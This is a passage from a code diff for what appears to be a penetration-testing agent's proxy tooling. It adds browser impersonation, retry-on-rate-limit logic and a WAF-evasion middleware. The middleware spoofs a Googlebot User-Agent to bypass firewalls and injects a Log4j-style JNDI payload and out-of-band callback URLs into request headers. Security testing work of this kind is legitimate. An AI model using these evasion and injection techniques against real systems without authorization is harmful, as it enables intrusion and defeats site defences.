attempt > 0: + time.sleep(1 + random.random()) # Add jitter + # In a real scenario, we would rotate self.proxies here + # logger.info(f"Rotating proxy (Attempt {attempt})") + + try: + response = curl_cffi.requests.request( + method=method, + url=url, + headers=headers, + data=body or None, + proxies=self.proxies, + timeout=timeout, + verify=False, + impersonate="chrome110" + ) + + # Smart Rotation Check + if response.status_code == 429: + attempt += 1 + if attempt <= max_retries: + continue + + response_time = int((time.time() - start_time) * 1000) + + body_content = response.text + if len(body_content) > 10000: + body_content = body_content[:10000] + "\n... [truncated]" + + return { + "status_code": response.status_code, + "headers": dict(response.headers), + "body": body_content, + "response_time_ms": response_time, + "url": response.url, + "message": ( + "Request sent through proxy (chrome110 impersonation) - check list_requests() for captured traffic" + ), + } - body_content = response.text - if len(body_content) > 10000: - body_content = body_content[:10000] + "\n... [truncated]" + except RequestsError as e: + # Retry on connection errors if we haven't exhausted retries + attempt += 1 + if attempt > max_retries: + raise e - return { - "status_code": response.status_code, - "headers": dict(response.headers), - "body": body_content, - "response_time_ms": response_time, - "url": response.url, - "message": ( - "Request sent through proxy - check list_requests() for captured traffic" - ), - } - except (RequestException, ProxyError, Timeout) as e: + except (RequestException, ProxyError, Timeout, RequestsError) as e: return {"error": f"Request failed: {type(e).__name__}", "details": str(e), "url": url} def repeat_request( @@ -376,7 +407,7 @@ def _send_modified_request( ) -> dict[str, Any]: try: start_time = time.time() - response = requests.request( + response = curl_cffi.requests.request( method=request_data["method"], url=request_data["url"], headers=request_data["headers"], @@ -384,6 +415,7 @@ def _send_modified_request( proxies=self.proxies, timeout=30, verify=False, + impersonate="chrome110" ) response_time = int((time.time() - start_time) * 1000) @@ -422,7 +454,7 @@ def _send_modified_request( "details": str(e), "original_request_id": request_id, } - except (RequestException, Timeout) as e: + except (RequestException, Timeout, RequestsError) as e: return { "error": f"Failed to repeat request: {type(e).__name__}", "details": str(e), diff --git a/strix/tools/proxy/waf_evasion.py b/strix/tools/proxy/waf_evasion.py new file mode 100644 index 00000000..8d577d4f --- /dev/null +++ b/strix/tools/proxy/waf_evasion.py @@ -0,0 +1,99 @@ +import urllib.parse +from typing import Any, Dict, Optional, List + +class WAFEvasionMiddleware: + """ + Adaptive WAF Evasion Middleware. + + This middleware intercepts failed requests (403/406) and attempts to retry them + using semantic equivalent payloads to bypass WAFs. + Also handles OOB payload injection. + """ + + def __init__(self): + self.waf_profile = { + "blocked_chars": set(), + "blocked_keywords": set(), + "successful_techniques": [] + } + self.interactsh_domain = "oob.interactsh.com" # Placeholder, real agent would fetch this + + def process_response(self, request: Dict[str, Any], response: Dict[str, Any]) -> Optional[Dict[str, Any]]: + """ + Check if response indicates a WAF block. If so, return a modified request payload (new mutation). + If not blocked or no evasion possible, return None. + """ + status_code = response.get("status_code", 0) + + # Detect WAF block + if status_code in [403, 406] or "waf" in str(response.get("body", "")).lower(): + # For simplicity, we only try one mutation per block to avoid infinite loops in this basic implementation + # In a real agent, we would check if this request was already a mutation. + if request.get("headers", {}).get("X-WAF-Evasion-Attempt"): + return None + + return self._generate_evasion_mutation(request) + + return None + + def inject_oob_payloads(self, request: Dict[str, Any]) -> Dict[str, Any]: + """ + Injects OOB (Interactsh) payloads into headers for blind vulnerability detection. + """ + if not self.interactsh_domain: + return request + + modified = request.copy() + headers = modified.get("headers", {}).copy() + + payload = f"${{jndi:ldap://{self.interactsh_domain}/a}}" # Log4j style + payload_simple = f"http://{self.interactsh_domain}/" + + # Inject into standard tracking headers + headers["X-Forwarded-For"] = payload_simple + headers["Referer"] = headers.get("Referer", "") + payload_simple + headers["User-Agent"] = headers.get("User-Agent", "") + " " + payload_simple + headers["X-Api-Version"] = payload_simple + + modified["headers"] = headers + return modified + + def _generate_evasion_mutation(self, request: Dict[str, Any]) -> Optional[Dict[str, Any]]: + """ + Generate a mutated request to evade WAF. + """ + mutated_request = request.copy() + headers = mutated_request.get("headers", {}).copy() + headers["X-WAF-Evasion-Attempt"] = "true" + mutated_request["headers"] = headers + + # Strategy 1: Header Manipulation (User-Agent rotation) + headers["User-Agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" + + # Strategy 2: URL Encoding (if applicable) + if "url" in mutated_request: + # Simple double encoding simulation or specific char encoding + # For this MVP, we just append a cache buster or harmless param to change signature + if "?" in mutated_request["url"]: + mutated_request["url"] += "&waf_bypass=1" + else: + mutated_request["url"] += "?waf_bypass=1" + + # Strategy 3: Whitespace Polymorphism (concept only as we don't have SQL parser here) + # If body is present and looks like SQL, we could replace spaces with comments. + + return mutated_request + + def update_profile(self, payload: str, was_blocked: bool): + """ + Update the WAF profile based on success/failure of payloads. + """ + if was_blocked: + # Logic to analyze what was blocked + pass + else: + if payload: + self.waf_profile["successful_techniques"].append(payload) + +# Singleton instance +waf_middleware = WAFEvasionMiddleware()